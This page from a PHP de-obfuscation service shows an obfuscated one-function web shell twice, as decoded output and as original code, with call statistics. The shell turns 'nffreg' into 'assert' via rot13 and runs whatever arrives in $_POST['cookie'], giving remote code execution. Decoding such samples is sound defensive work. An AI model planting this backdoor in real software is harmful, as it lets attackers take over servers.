Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function aishen($user){ $b='s'.'tr_r'.'ot13'; $c=&$b; ..
Decoded Output download
<?php
function aishen($user){
$b='s'.'tr_r'.'ot13';
$c=&$b;
$a=$c('nffreg');
if(empty($user)){
$user="echo '90sec'";
}
$a($user);
}
aishen($_POST['cookie']);
?>
Did this file decode correctly?
Original Code
<?php
function aishen($user){
$b='s'.'tr_r'.'ot13';
$c=&$b;
$a=$c('nffreg');
if(empty($user)){
$user="echo '90sec'";
}
$a($user);
}
aishen($_POST['cookie']);
?>
Function Calls
aishen | 1 |
str_rot13 | 1 |
Stats
MD5 | 077df38cbfc64b24560270a5766d688a |
Eval Count | 0 |
Decode Time | 103 ms |